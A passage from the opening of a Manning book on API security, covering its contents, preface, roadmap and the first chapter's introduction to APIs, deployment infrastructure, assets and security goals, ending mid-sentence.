Securing microservice communications
368
Securing communications with TLS
368
■ Using a service mesh
for TLS
370
■ Locking down network connections
375
10.4
Securing incoming requests
377
11
Securing service-to-service APIs
383
11.1
API keys and JWT bearer authentication
384
11.2
The OAuth2 client credentials grant
385
Service accounts
387
11.3
The JWT bearer grant for OAuth2
389
Client authentication
391
■ Generating the JWT
393
Service account authentication
395
11.4
Mutual TLS authentication
396
How TLS certificate authentication works
397
■ Client certificate
authentication
399
■ Verifying client identity
402
■ Using a
service mesh
406
■ Mutual TLS with OAuth2
409
Certificate-bound access tokens
410
11.5
Managing service credentials
415
Kubernetes secrets
415
■ Key and secret management
services
420
■ Avoiding long-lived secrets on disk
423
Key derivation
425
CONTENTS
x
11.6
Service API calls in response to user requests
428
The phantom token pattern
429
■ OAuth2 token exchange
431
PART 5
APIS FOR THE INTERNET OF THINGS ...............437
12
Securing IoT communications
439
12.1
Transport layer security
440
Datagram TLS
441
■ Cipher suites for constrained devices
452
12.2
Pre-shared keys
458
Implementing a PSK server
460
■ The PSK client
462
Supporting raw PSK cipher suites
463
■ PSK with forward
secrecy
465
12.3
End-to-end security
467
COSE
468
■ Alternatives to COSE
472
■ Misuse-resistant
authenticated encryption
475
12.4
Key distribution and management
479
One-off key provisioning
480
■ Key distribution servers
481
Ratcheting for forward secrecy
482
■ Post-compromise
security
484
13
Securing IoT APIs
488
13.1
Authenticating devices
489
Identifying devices
489
■ Device certificates
492
Authenticating at the transport layer
492
13.2
End-to-end authentication
496
OSCORE
499
■ Avoiding replay in REST APIs
506
13.3
OAuth2 for constrained environments
511
The device authorization grant
512
■ ACE-OAuth
517
13.4
Offline access control
518
Offline user authentication
518
■ Offline authorization
520
appendix A
Setting up Java and Maven
523
appendix B
Setting up Kubernetes
532
index
535
xi
preface
I have been a professional software developer, off and on, for about 20 years now, and
I’ve worked with a wide variety of APIs over those years. My youth was spent hacking
together adventure games in BASIC and a little Z80 machine code, with no concern
that anyone else would ever use my code, let alone need to interface with it. It wasn’t
until I joined IBM in 1999 as a pre-university employee (affectionately known as
“pooeys”) that I first encountered code that was written to be used by others. I remem-
ber a summer spent valiantly trying to integrate a C++ networking library into a testing
framework with only a terse email from the author to guide me. In those days I was
more concerned with deciphering inscrutable compiler error messages than thinking
about security.
Over time the notion of API has changed to encompass remotely accessed inter-
faces where security is no longer so easily dismissed. Running scared from C++, I
found myself in a world of Enterprise Java Beans, with their own flavor of remote API
calls and enormous weight of interfaces and boilerplate code. I could never quite
remember what it was I was building in those days, but whatever it was must be tre-
mendously important to need all this code. Later we added a lot of XML in the form
of SOAP and XML-RPC. It didn’t help. I remember the arrival of RESTful APIs and
then JSON as a breath of fresh air: at last the API was simple enough that you could
stop and think about what you were exposing to the world. It was around this time
that I became seriously interested in security.
In 2013, I joined ForgeRock, then a startup recently risen from the ashes of Sun
Microsystems. They were busy writing modern REST APIs for their identity and access
PREFACE
xii
management products, and I dived right in. Along the way, I got a crash course in
modern token-based authentication and authorization techniques that have trans-
formed API security in recent years and form a large part of this book. When I was
approached by Manning about writing a book, I knew immediately that API security
would be the subject.
The outline of the book has changed many times during the course of writing it,
but I’ve stayed firm to the principle that details matter in security. You can’t achieve
security purely at an architectural level, by adding boxes labelled “authentication” or
“access control.” You must understand exactly what you are protecting and the guar-
antees those boxes can and can’t provide. On the other hand, security is not the place
to reinvent everything from scratch. In this book, I hope that I’ve successfully trodden
a middle ground: explaining why things are the way they are while also providing lots
of pointers to modern, off-the-shelf solutions to common security problems.
A second guiding principle has been to emphasize that security techniques are
rarely one-size-fits-all. What works for a web application may be completely inappro-
priate for use in a microservices architecture. Drawing on my direct experience, I’ve
included chapters on securing APIs for web and mobile clients, for microservices in
Kubernetes environments, and APIs for the Internet of Things. Each environment
brings its own challenges and solutions.
xiii
acknowledgments
I knew writing a book would be a lot of hard work, but I didn’t know that starting it
would coincide with some of the hardest moments of my life personally, and that I
would be ending it in the midst of a global pandemic. I couldn’t have got through it
all without the unending support and love of my wife, Johanna. I’d also like to thank
our daughter, Eliza (the littlest art director), and all our friends and family.
Next, I’d like to thank everyone at Manning who’ve helped turn this book into a
reality. I’d particularly like to thank my development editor, Toni Arritola, who has
patiently guided my teaching style, corrected my errors, and reminded me who I am
writing for. I’d also like to thank my technical editor, Josh White, for keeping me hon-
est with a lot of great feedback. A big thank you to everybody else at Manning who has
helped me along the way. Deirdre Hiam, my project editor; Katie Petito, my copyedi-
tor; Keri Hales, my proofreader; and Ivan Martinovic´, my review editor. It’s been a
pleasure working with you all.
I’d like to thank my colleagues at ForgeRock for their support and encouragement.
I’d particularly like to thank Jamie Nelson and Jonathan Scudder for encouraging me to
work on the book, and to everyone who reviewed early drafts, in particular Simon
Moffatt, Andy Forrest, Craig McDonnell, David Luna, Jaco Jooste, and Robert Wapshott.
Finally, I’d like to thank Jean-Philippe Aumasson, Flavien Binet, and Anthony
Vennard at Teserakt for their expert review of chapters 12 and 13, and the anonymous
reviewers of the book who provided many detailed comments.
To all the reviewers, Aditya Kaushik, Alexander Danilov, Andres Sacco, Arnaldo
Gabriel, Ayala Meyer, Bobby Lin, Daniel Varga, David Pardo, Gilberto Taccari, Harinath
ACKNOWLEDGMENTS
xiv
Kuntamukkala, John Guthrie, Jorge Ezequiel Bo, Marc Roulleau, Michael Stringham,
Ruben Vandeginste, Ryan Pulling, Sanjeev Kumar Jaiswal (Jassi), Satej Sahu, Steve
Atchue, Stuart Perks, Teddy Hagos, Ubaldo Pescatore, Vishal Singh, Willhelm Lehman,
and Zoheb Ainapore: your suggestions helped make this a better book.
xv
about this book
Who should read this book
API Security in Action is written to guide you through the techniques needed to secure
APIs in a variety of environments. It begins by covering basic secure coding tech-
niques and then looks at authentication and authorization techniques in depth.
Along the way, you’ll see how techniques such as rate-limiting and encryption can be
used to harden your APIs against attacks.
This book is written for developers who have some experience in building web
APIs and want to improve their knowledge of API security techniques and best prac-
tices. You should have some familiarity with building RESTful or other remote APIs
and be confident in using a programming language and tools such as an editor or
IDE. No prior experience with secure coding or cryptography is assumed. The book
will also be useful to technical architects who want to come up to speed with the latest
API security approaches.
How this book is organized: A roadmap
This book has five parts that cover 13 chapters.
Part 1 explains the fundamentals of API security and sets the secure foundation for
the rest of the book.
■
Chapter 1 introduces the topic of API security and how to define what makes an
API secure. You’ll learn the basic mechanisms involved in securing an API and
how to think about threats and vulnerabilities.
ABOUT THIS BOOK
xvi
■
Chapter 2 describes the basic principles involved in secure development and
how they apply to API security. You’ll learn how to avoid many common soft-
ware security flaws using standard coding practices. This chapter also intro-
duces the example application, called Natter, whose API forms the basis of code
samples throughout the book.
■
Chapter 3 is a whirlwind tour of all the basic security mechanisms developed in
the rest of the book. You’ll see how to add basic authentication, rate-limiting,
audit logging, and access control mechanisms to the Natter API.
Part 2 looks at authentication mechanism for RESTful APIs in more detail. Authenti-
cation is the bedrock upon which all other security controls build, so we spend some
time ensuring this foundation is firmly established.
■
Chapter 4 covers traditional session cookie authentication and updates it for
modern web API usage, showing how to adapt techniques from traditional web
applications. You’ll also cover new developments such as SameSite cookies.
■
Chapter 5 looks at alternative approaches to token-based authentication, cover-
ing bearer tokens and the standard Authorization header. It also covers using
local storage to store tokens in a web browser and hardening database token
storage in the backend.
■
Chapter 6 discusses self-contained token formats such as JSON Web Tokens and
alternatives.
Part 3 looks at approaches to authorization and deciding who can do what.
■
Chapter 7 describes OAuth2, which is both a standard approach to token-based
authentication and an approach to delegated authorization.
■
Chapter 8 looks in depth at identity-based access control techniques in which the
identity of the user is used to determine what they are allowed to do. It covers
access control lists, role-based access control, and attribute-based access control.
■
Chapter 9 then looks at capability-based access control, which is an alternative
to identity-based approaches based on fine-grained keys. It also covers maca-
roons, which are an interesting new token format that enables exciting new
approaches to access control.
Part 4 is a deep dive into securing microservice APIs running in a Kubernetes
environment.
■
Chapter 10 is a detailed introduction to deploying APIs in Kubernetes and best
practices for security from a developer’s point of view.
■
Chapter 11 discusses approaches to authentication in service-to-service API calls
and how to securely store service account credentials and other secrets.
Part 5 looks at APIs in the Internet of Things (IoT). These APIs can be particularly
challenging to secure due to the limited capabilities of the devices and the variety of
threats they may encounter.
ABOUT THIS BOOK
xvii
■
Chapter 12 describes how to secure communications between clients and ser-
vices in an IoT environment. You’ll learn how to ensure end-to-end security
when API requests must travel over multiple transport protocols.
■
Chapter 13 details approaches to authorizing API requests in IoT environ-
ments. It also discusses offline authentication and access control when devices
are disconnected from online services.
About the code
This book contains many examples of source code both in numbered listings and in
line with normal text. In both cases, source code is formatted in a fixed-width font
like this to separate it from ordinary text. Sometimes code is also in bold to high-
light code that has changed from previous steps in the chapter, such as when a new
feature adds to an existing line of code.
In many cases, the original source code has been reformatted; we’ve added line
breaks and reworked indentation to accommodate the available page space in the
book. In rare cases, even this was not enough, and listings include line-continuation
markers (➥). Additionally, comments in the source code have often been removed
from the listings when the code is described in the text. Code annotations accompany
many of the listings, highlighting important concepts.
Source code is provided for all chapters apart from chapter 1 and can be down-
loaded from the GitHub repository accompanying the book at https://github.com/
NeilMadden/apisecurityinaction or from Manning. The code is written in Java but has
been written to be as neutral as possible in coding style and idioms. The examples
should translate readily to other programming languages and frameworks. Full details
of the required software and how to set up Java are provided in appendix A.
liveBook discussion forum
Purchase of API Security in Action includes free access to a private web forum run by
Manning Publications where you can make comments about the book, ask technical
questions, and receive help from the author and from other users. To access the
forum, go to https://livebook.manning.com/#!/book/api-security-in-action/discussion.
You can also learn more about Manning’s forums and the rules of conduct at https://
livebook.manning.com/#!/discussion.
Manning’s commitment to our readers is to provide a venue where a meaningful
dialogue between individual readers and between readers and the author can take
place. It is not a commitment to any specific amount of participation on the part of
the author, whose contribution to the forum remains voluntary (and unpaid). We sug-
gest you try asking the author some challenging questions lest his interest stray! The
forum and the archives of previous discussions will be accessible from the publisher’s
website as long as the book is in print.
ABOUT THIS BOOK
xviii
Other online resources
Need additional help?
■
The Open Web Application Security Project (OWASP) provides numerous
resources for building secure web applications and APIs. I particularly like the
cheat sheets on security topics at https://cheatsheetseries.owasp.org.
■
https://oauth.net provides a central directory of all things OAuth2. It’s a great
place to find out about all the latest developments.
xix
about the author
NEIL MADDEN is Security Director at ForgeRock and has an in-depth knowledge of
applied cryptography, application security, and current API security technologies. He
has worked as a programmer for 20 years and holds a PhD in Computer Science.
xx
about the cover illustration
The figure on the cover of API Security in Action is captioned “Arabe du désert,” or
Arab man in the desert. The illustration is taken from a collection of dress costumes
from various countries by Jacques Grasset de Saint-Sauveur (1757–1810), titled Cos-
tumes de Différents Pays, published in France in 1788. Each illustration is finely drawn
and colored by hand. The rich variety of Grasset de Saint-Sauveur’s collection
reminds us vividly of how culturally apart the world’s towns and regions were just
200 years ago. Isolated from each other, people spoke different dialects and lan-
guages. In the streets or in the countryside, it was easy to identify where they lived and
what their trade or station in life was just by their dress. The way we dress has changed
since then and the diversity by region, so rich at the time, has faded away. It is now hard
to tell apart the inhabitants of different continents, let alone different towns, regions,
or countries. Perhaps we have traded cultural diversity for a more varied personal
life—certainly for a more varied and fast-paced technological life. At a time when it is
hard to tell one computer book from another, Manning celebrates the inventiveness
and initiative of the computer business with book covers based on the rich diversity of
regional life of two centuries ago, brought back to life by Grasset de Saint-Sauveur’s
pictures.
Part 1
Foundations
This part of the book creates the firm foundation on which the rest of the
book will build.
Chapter 1 introduces the topic of API security and situates it in relation to
other security topics. It covers how to define what security means for an API and
how to identify threats. It also introduces the main security mechanisms used in
protecting an API.
Chapter 2 is a run-through of secure coding techniques that are essential to
building secure APIs. You’ll see some fundamental attacks due to common cod-
ing mistakes, such as SQL injection or cross-site scripting vulnerabilities, and
how to avoid them with simple and effective countermeasures.
Chapter 3 takes you through the basic security mechanisms involved in API
security: rate-limiting, encryption, authentication, audit logging, and authoriza-
tion. Simple but secure versions of each control are developed in turn to help
you understand how they work together to protect your APIs.
After reading these three chapters, you’ll know the basics involved in secur-
ing an API.
3
What is API security?
Application Programming Interfaces (APIs) are everywhere. Open your smartphone or
tablet and look at the apps you have installed. Almost without exception, those
apps are talking to one or more remote APIs to download fresh content and mes-
sages, poll for notifications, upload your new content, and perform actions on
your behalf.
Load your favorite web page with the developer tools open in your browser, and
you’ll likely see dozens of API calls happening in the background to render a page
that is heavily customized to you as an individual (whether you like it or not). On
the server, those API calls may themselves be implemented by many microservices
communicating with each other via internal APIs.
Increasingly, even the everyday items in your home are talking to APIs in the
cloud—from smart speakers like Amazon Echo or Google Home, to refrigerators,
This chapter covers
What is an API?
What makes an API secure or insecure?
Defining security in terms of goals
Identifying threats and vulnerabilities
Using mechanisms to achieve security goals
4
CHAPTER 1
What is API security?
electricity meters, and lightbulbs. The Internet of Things (IoT) is rapidly becoming a
reality in both consumer and industrial settings, powered by ever-growing numbers of
APIs in the cloud and on the devices themselves.
While the spread of APIs is driving ever more sophisticated applications that
enhance and amplify our own abilities, they also bring increased risks. As we become
more dependent on APIs for critical tasks in work and play, we become more vulnera-
ble if they are attacked. The more APIs are used, the greater their potential to be
attacked. The very property that makes APIs attractive for developers—ease of use—
also makes them an easy target for malicious actors. At the same time, new privacy and
data protection legislation, such as the GDPR in the EU, place legal requirements on
companies to protect users’ data, with stiff penalties if data protections are found to
be inadequate.
This book is about how to secure your APIs against these threats so that you can confi-
dently expose them to the world.
1.1
An analogy: Taking your driving test
To illustrate some of the concepts of API security, consider an analogy from real life:
taking your driving test. This may not seem at first to have much to do with either APIs
or security, but as you will see, there are similarities between aspects of this story and
key concepts that you will learn in this chapter.
You finish work at 5 p.m. as usual. But today is special. Rather than going home to
tend to your carnivorous plant collection and then flopping down in front of the TV,
you have somewhere else to be. Today you are taking your driving test.
You rush out of your office and across the park to catch a bus to the test center. As
you stumble past the queue of people at the hot dog stand, you see your old friend
Alice walking her pet alpaca, Horatio.
“Hi Alice!” you bellow jovially. “How’s the miniature recreation of 18th-century
Paris coming along?”
“Good!” she replies. “You should come and see it soon.”
GDPR
The General Data Protection Regulation (GDPR) is a significant piece of EU law that
came into force in 2018. The aim of the law is to ensure that EU citizens’ personal
data is not abused and is adequately protected by both technical and organizational
controls. This includes security controls that will be covered in this book, as well as
privacy techniques such as pseudonymization of names and other personal informa-
tion (which we will not cover) and requiring explicit consent before collecting or shar-
ing personal data. The law requires companies to report any data breaches within 72
hours and violations of the law can result in fines of up to €20 million (approximately
$23.6 million) or 4% of the worldwide annual turnover of the company. Other jurisdic-
tions are following the lead of the EU and introducing similar privacy and data protec-
tion legislation.
5
An analogy: Taking your driving test
She makes the universally recognized hand-gesture for “call me” and you both
hurry on your separate ways.
You arrive at the test center a little hot and bothered from the crowded bus jour-
ney. If only you could drive, you think to yourself! After a short wait, the examiner
comes out and introduces himself. He asks to see your learner’s driving license and
studies the old photo of you with that bad haircut you thought was pretty cool at the
time. After a few seconds of quizzical stares, he eventually accepts that it is really you,
and you can begin the test.
LEARN ABOUT IT
Most APIs need to identify the clients that are interacting
with them. As these fictional interactions illustrate, there may be different
ways of identifying your API clients that are appropriate in different situa-
tions. As with Alice, sometimes there is a long-standing trust relationship
based on a history of previous interactions, while in other cases a more formal
proof of identity is required, like showing a driving license. The examiner
trusts the license because it is issued by a trusted body, and you match the
photo on the license. Your API may allow some operations to be performed
with only minimal identification of the user but require a higher level of iden-
tity assurance for other operations.
You failed the test this time, so you decide to take a train home. At the station you buy
a standard class ticket back to your suburban neighborhood, but feeling a little devil-
may-care, you decide to sneak into the first-class carriage. Unfortunately, an attendant
blocks your way and demands to see your ticket. Meekly you scurry back into standard
class and slump into your seat with your headphones on.
When you arrive home, you see the light flashing on your answering machine.
Huh, you’d forgotten you even had an answering machine. It’s Alice, inviting you to
the hot new club that just opened in town. You could do with a night out to cheer you
up, so you decide to go.
The doorwoman takes one look at you.
“Not tonight,” she says with an air of sniffy finality.
At that moment, a famous celebrity walks up and is ushered straight inside.
Dejected and rejected, you head home.
What you need is a vacation. You book yourself a two-week stay in a fancy hotel.
While you are away, you give your neighbor Bob the key to your tropical greenhouse
so that he can feed your carnivorous plant collection. Unknown to you, Bob throws a
huge party in your back garden and invites half the town. Thankfully, due to a miscal-
culation, they run out of drinks before any real damage is done (except to Bob’s repu-
tation) and the party disperses. Your prized whisky selection remains safely locked
away inside.
LEARN ABOUT IT
Beyond just identifying your users, an API also needs to be
able to decide what level of access they should have. This can be based on who
they are, like the celebrity getting into the club, or based on a limited-time
6
CHAPTER 1
What is API security?
token like a train ticket, or a long-term key like the key to the greenhouse that
you lent your neighbor. Each approach has different trade-offs. A key can be
lost or stolen and then used by anybody. On the other hand, you can have dif-
ferent keys for different locks (or different operations) allowing only a small
amount of authority to be given to somebody else. Bob could get into the
greenhouse and garden but not into your house and whisky collection.
When you return from your trip, you review the footage from your comprehensive
(some might say over-the-top) camera surveillance system. You cross Bob off the
Christmas card list and make a mental note to ask someone else to look after the
plants next time.
The next time you see Bob you confront him about the party. He tries to deny it at
first, but when you point out the cameras, he admits everything. He buys you a lovely
new Venus flytrap to say sorry. The video cameras show the advantage of having good
audit logs so that you can find out who did what when things go wrong, and if neces-
sary, prove who was responsible in a way they cannot easily deny.
DEFINITION
An audit log records details of significant actions taken on a sys-
tem, so that you can later work out who did what and when. Audit logs are
crucial evidence when investigating potential security breaches.
You can hopefully now see a few of the mechanisms that are involved in securing an
API, but before we dive into the details let’s review what an API is and what it means
for it to be secure.
1.2
What is an API?
Traditionally, an API was provided by a software library that could be linked into an
application either statically or dynamically at runtime, allowing reuse of procedures
and functions for specific problems, such as OpenGL for 3D graphics, or libraries for
TCP/IP networking. Such APIs are still common, but a growing number of APIs are
now made available over the internet as RESTful web services.
Broadly speaking, an API is a boundary between one part of a software system and
another. It defines a set of operations that one component provides for other parts of
the system (or other systems) to use. For example, a photography archive might pro-
vide an API to list albums of photos, to view individual photos, add comments, and so
on. An online image gallery could then use that API to display interesting photos,
while a word processor application could use the same API to allow embedding
images into a document. As shown in figure 1.1, an API handles requests from one or
more clients on behalf of users. A client may be a web or mobile application with a
user interface (UI), or it may be another API with no explicit UI. The API itself may
talk to other APIs to get its work done.
A UI also provides a boundary to a software system and restricts the operations that
can be performed. What distinguishes an API from a UI is that an API is explicitly
designed to be easy to interact with by other software, while a UI is designed to be easy
7
What is an API?
for a user to interact with directly. Although a UI might present information in a rich
form to make the information pleasing to read and easy to interact with, an API typi-
cally will present instead a highly regular and stripped-back view of the raw data in a
form that is easy for a program to parse and manipulate.
1.2.1
API styles
There are several popular approaches to exposing remote APIs:
Remote Procedure Call (RPC) APIs expose a set of procedures or functions that
can be called by clients over a network connection. The RPC style is designed to
resemble normal procedure calls as if the API were provided locally. RPC APIs
often use compact binary formats for messages and are very efficient, but usu-
ally require the client to install specific libraries (known as stubs) that work with
a single API. The gRPC framework from Google (https://grpc.io) is an example
of a modern RPC approach. The older SOAP (Simple Object Access Protocol)
framework, which uses XML for messages, is still widely deployed.
A variant of the RPC style known as Remote Method Invocation (RMI) uses object-
oriented techniques to allow clients to call methods on remote objects as if
they were local. RMI approaches used to be very popular, with technologies
such as CORBA and Enterprise Java Beans (EJBs) often used for building large
Users
Clients
Web
IoT
Mobile
Request
Response
Upstream
APIs
Backend
APIs
Backend
APIs
Backend
APIs
UI
Business
logic
Your API
Figure 1.1
An API handles requests from clients on behalf of users. Clients may be web browsers,
mobile apps, devices in the Internet of Things, or other APIs. The API services requests according
to its internal logic and then at some point returns a response to the client. The implementation of
the API may require talking to other “backend” APIs, provided by databases or processing systems.
8
CHAPTER 1
What is API security?
enterprise systems. The complexity of these frameworks has led to a decline in
their use.
The REST (REpresentational State Transfer) style was developed by Roy Fielding to
describe the principles that led to the success of HTTP and the web and was later
adapted as a set of principles for API design. In contrast to RPC, RESTful APIs
emphasize standard message formats and a small number of generic operations
to reduce the coupling between a client and a specific API. Use of hyperlinks to
navigate the API reduce the risk of clients breaking as the API evolves over time.
Some APIs are mostly concerned with efficient querying and filtering of large
data sets, such as SQL databases or the GraphQL framework from Facebook
(https://graphql.org). In these cases, the API often only provides a few opera-
tions and a complex query language allows the client significant control over
what data is returned.
Different API styles are suitable for different environments. For example, an organiza-
tion that has adopted a microservices architecture might opt for an efficient RPC frame-
work to reduce the overhead of API calls. This is appropriate because the organization
controls all of the clients and servers in this environment and can manage distributing
new stub libraries when they are required. On the other hand, a widely used public
API might be better suited to the REST style using a widely used format such as JSON
to maximize interoperability with different types of clients.
DEFINITION
In a microservices architecture, an application is deployed as a collec-
tion of loosely coupled services rather than a single large application, or
monolith. Each microservice exposes an API that other services talk to. Secur-
ing microservice APIs is covered in detail in part 4 of this book.
This book will focus on APIs exposed over HTTP using a loosely RESTful approach, as
this is the predominant style of API at the time of writing. That is, although the APIs
that are developed in this book will try to follow REST design principles, you will
sometimes deviate from those principles to demonstrate how to secure other styles of
API design. Much of the advice will apply to other styles too, and the general princi-
ples will even apply when designing a library.
1.3
API security in context
API Security lies at the intersection of several security disciplines, as shown in figure 1.2.
The most important of these are the following three areas:
1
Information security (InfoSec) is concerned with the protection of information
over its full life cycle from creation, storage, transmission, backup, and eventual
destruction.
2
Network security deals with both the protection of data flowing over a network
and prevention of unauthorized access to the network itself.
3
Application security (AppSec) ensures that software systems are designed and built
to withstand attacks and misuse.
9
API security in context
Each of these three topics has filled many books individually, so we will not cover each
of them in full depth. As figure 1.2 illustrates, you do not need to learn every aspect of
these topics to know how to build secure APIs. Instead, we will pick the most critical
areas from each and blend them to give you a thorough understanding of how they
apply to securing an API.
From information security you will learn how to:
Define your security goals and identify threats
Protect your APIs using access control techniques
Secure information using applied cryptography
DEFINITION
Cryptography is the science of protecting information so that two
or more people can communicate without their messages being read or tam-
pered with by anybody else. It can also be used to protect information written
to disk.
From network security you will learn:
The basic infrastructure used to protect an API on the internet, including fire-
walls, load-balancers, and reverse proxies, and roles they play in protecting your
API (see the next section)
Use of secure communication protocols such as HTTPS to protect data trans-
mitted to or from your API
DEFINITION
HTTPS is the name for HTTP running over a secure connection.
While normal HTTP requests and responses are visible to anybody watching
the network traffic, HTTPS messages are hidden and protected by Transport
Layer Security (TLS, also known as SSL). You will learn how to enable HTTPS
for an API in chapter 3.
Network
security
Application
security
Information
security
API security
Figure 1.2
API security lies at the
intersection of three security areas:
information security, network security,
and application security.
10
CHAPTER 1
What is API security?
Finally, from application security you will learn:
Secure coding techniques
Common software security vulnerabilities
How to store and manage system and user credentials used to access your APIs
1.3.1
A typical API deployment
An API is implemented by application code running on a server; either an application
server such as Java Enterprise Edition (Java EE), or a standalone server. It is very rare to
directly expose such a server to the internet, or even to an internal intranet. Instead,
requests to the API will typically pass through one or more additional network services
before they reach your API servers, as shown in figure 1.3. Each request will pass
through one or more firewalls, which inspect network traffic at a relatively low level
and ensure that any unexpected traffic is blocked. For example, if your APIs are serv-
ing requests on port 80 (for HTTP) and 443 (for HTTPS), then the firewall would
be configured to block any requests for any other ports. A load balancer will then
route traffic to appropriate services and ensure that one server is not overloaded
with lots of requests while others sit idle. Finally, a reverse proxy (or gateway) is typi-
cally placed in front of the application servers to perform computationally expensive
operations like handling TLS encryption (known as SSL termination) and validating
credentials on requests.
DEFINITION
SSL termination1 (or SSL offloading) occurs when a TLS connec-
tion from a client is handled by a load balancer or reverse proxy in front of
the destination API server. A separate connection from the proxy to the back-
end server is then made, which may either be unencrypted (plain HTTP) or
encrypted as a separate TLS connection (known as SSL re-encryption).
Beyond these basic elements, you may encounter several more specialist services:
An API gateway is a specialized reverse proxy that can make different APIs appear
as if they are a single API. They are often used within a microservices architec-
ture to simplify the API presented to clients. API gateways can often also take
care of some of the aspects of API security discussed in this book, such as authen-
tication or rate-limiting.
A web application firewall (WAF) inspects traffic at a higher level than a tradi-
tional firewall and can detect and block many common attacks against HTTP
web services.
An intrusion detection system (IDS) or intrusion prevention system (IPS) monitors
traffic within your internal networks. When it detects suspicious patterns of
activity it can either raise an alert or actively attempt to block the suspicious
traffic.
1 In this context, the newer term TLS is rarely used.
11
API security in context
In practice, there is often some overlap between these services. For example, many
load balancers are also capable of performing tasks of a reverse proxy, such as termi-
nating TLS connections, while many reverse proxies can also function as an API
gateway. Certain more specialized services can even handle many of the security
mechanisms that you will learn in this book, and it is becoming common to let a gate-
way or reverse proxy handle at least some of these tasks. There are limits to what these
Internet
Firewalls block
unwanted network
traffic.
Load balancer
API
server
API
server
API
server
API
server
Reverse
proxy
Reverse
proxy
Database
Database
Load balancer
A load balancer distributes
requests between servers.
Reverse proxies can do
more complex routing and
handle tasks such as SSL
termination or rate-limiting
on behalf of API servers.
API servers
implement
the API itself.
There may be
additional load
balancers and
proxies separating
API servers from
databases or
other services.
Reverse
proxy
Request from clients
Figure 1.3
Requests to your API servers will typically pass through several other services first.
A firewall works at the TCP/IP level and only allows traffic in or out of the network that matches
expected flows. A load balancer routes requests to appropriate internal services based on the
request and on its knowledge of how much work each server is currently doing. A reverse proxy
or API gateway can take care of expensive tasks on behalf of the API server, such as terminating
HTTPS connections or validating authentication credentials.
12
CHAPTER 1
What is API security?
components can do, and poor security practices in your APIs can undermine even the
most sophisticated gateway. A poorly configured gateway can also introduce new risks
to your network. Understanding the basic security mechanisms used by these products
will help you assess whether a product is suitable for your application, and exactly
what its strengths and limitations are.
1.4
Elements of API security
An API by its very nature defines a set of operations that a caller is permitted to use. If
you don’t want a user to perform some operation, then simply exclude it from the
API. So why do we need to care about API security at all?
First, the same API may be accessible to users with distinct levels of authority;
for example, with some operations allowed for only administrators or other
users with a special role. The API may also be exposed to users (and bots) on
the internet who shouldn’t have any access at all. Without appropriate access
controls, any user can perform any action, which is likely to be undesirable.
These are factors related to the environment in which the API must operate.
Second, while each individual operation in an API may be secure on its own, com-
binations of operations might not be. For example, a banking API might offer
separate withdrawal and deposit operations, which individually check that limits
are not exceeded. But the deposit operation has no way to know if the money
being deposited has come from a real account. A better API would offer a
transfer operation that moves money from one account to another in a single
Pop quiz
1
Which of the following topics are directly relevant to API security? (Select all that
apply.)
a
Job security
b
National security
c
Network security
d
Financial security
e
Application security
f
Information security
2
An API gateway is a specialized version of which one of the following components?
a
Client
b
Database
c
Load balancer
d
Reverse proxy
e
Application server
The answers are at the end of the chapter.
13
Elements of API security
operation, guaranteeing that the same amount of money always exists. The secu-
rity of an API needs to be considered as a whole, and not as individual operations.
Last, there may be security vulnerabilities due to the implementation of the
API. For example, failing to check the size of inputs to your API may allow an
attacker to bring down your server by sending a very large input that consumes
all available memory; a type of denial of service (DoS) attack.
DEFINITION
A denial of service (DoS) attack occurs when an attacker can pre-
vent legitimate users from accessing a service. This is often done by flooding a
service with network traffic, preventing it from servicing legitimate requests,
but can also be achieved by disconnecting network connections or exploiting
bugs to crash the server.
Some API designs are more amenable to secure implementation than others, and
there are tools and techniques that can help to ensure a secure implementation. It is
much easier (and cheaper) to think about secure development before you begin cod-
ing rather than waiting until security defects are identified later in development or in
production. Retrospectively altering a design and development life cycle to account
for security is possible, but rarely easy. This book will teach you practical techniques
for securing APIs, but if you want a more thorough grounding in how to design-in
security from the start, then I recommend the book Secure by Design by Dan Bergh
Johnsson, Daniel Deogun, and Daniel Sawano (Manning, 2019).
It is important to remember that there is no such thing as a perfectly secure sys-
tem, and there is not even a single definition of “security.” For a healthcare provider,
being able to discover whether your friends have accounts on a system would be con-
sidered a major security flaw and a privacy violation. However, for a social network, the
same capability is an essential feature. Security therefore depends on the context.
There are many aspects that should be considered when designing a secure API,
including the following:
The assets that are to be protected, including data, resources, and physical devices
Which security goals are important, such as confidentiality of account names
The mechanisms that are available to achieve those goals
The environment in which the API is to operate, and the threats that exist in that
environment
1.4.1
Assets
For most APIs, the assets will consist of information, such as customer names and
addresses, credit card information, and the contents of databases. If you store infor-
mation about individuals, particularly if it may be sensitive such as sexual orientation
or political affiliations, then this information should also be considered an asset to
be protected.
There are also physical assets to consider, such as the physical servers or devices
that your API is running on. For servers running in a datacenter, there are relatively
14
CHAPTER 1
What is API security?
few risks of an intruder stealing or damaging the hardware itself, due to physical pro-
tections (fences, walls, locks, surveillance cameras, and so on) and the vetting and
monitoring of staff that work in those environments. But an attacker may be able to
gain control of the resources that the hardware provides through weaknesses in the
operating system or software running on it. If they can install their own software, they
may be able to use your hardware to perform their own actions and stop your legiti-
mate software from functioning correctly.
In short, anything connected with your system that has value to somebody should
be considered an asset. Put another way, if anybody would suffer real or perceived
harm if some part of the system were compromised, that part should be considered an
asset to be protected. That harm may be direct, such as loss of money, or it may be
more abstract, such as loss of reputation. For example, if you do not properly protect
your users’ passwords and they are stolen by an attacker, the users may suffer direct
harm due to the compromise of their individual accounts, but your organization
would also suffer reputational damage if it became known that you hadn’t followed
basic security precautions.
1.4.2
Security goals
Security goals are used to define what security actually means for the protection of your
assets. There is no single definition of security, and some definitions can even be con-
tradictory! You can break down the notion of security in terms of the goals that should
be achieved or preserved by the correct operation of the system. There are several
standard security goals that apply to almost all systems. The most famous of these are
the so-called “CIA Triad”:
Confidentiality—Ensuring information can only be read by its intended audience
Integrity—Preventing unauthorized creation, modification, or destruction of
information
Availability—Ensuring that the legitimate users of an API can access it when
they need to and are not prevented from doing so.
Although these three properties are almost always important, there are other security
goals that may be just as important in different contexts, such as accountability (who
did what) or non-repudiation (not being able to deny having performed an action). We
will discuss security goals in depth as you develop aspects of a sample API.
Security goals can be viewed as non-functional requirements (NFRs) and considered
alongside other NFRs such as performance or reliability goals. In common with other
NFRs, it can be difficult to define exactly when a security goal has been satisfied. It is
hard to prove that a security goal is never violated because this involves proving a nega-
tive, but it’s also difficult to quantify what “good enough” confidentiality is, for example.
One approach to making security goals precise is used in cryptography. Here,
security goals are considered as a kind of game between an attacker and the system,
with the attacker given various powers. A standard game for confidentiality is known
15
Elements of API security
as indistinguishability. In this game, shown in figure 1.4, the attacker gives the system
two equal-length messages, A and B, of their choosing and then the system gives
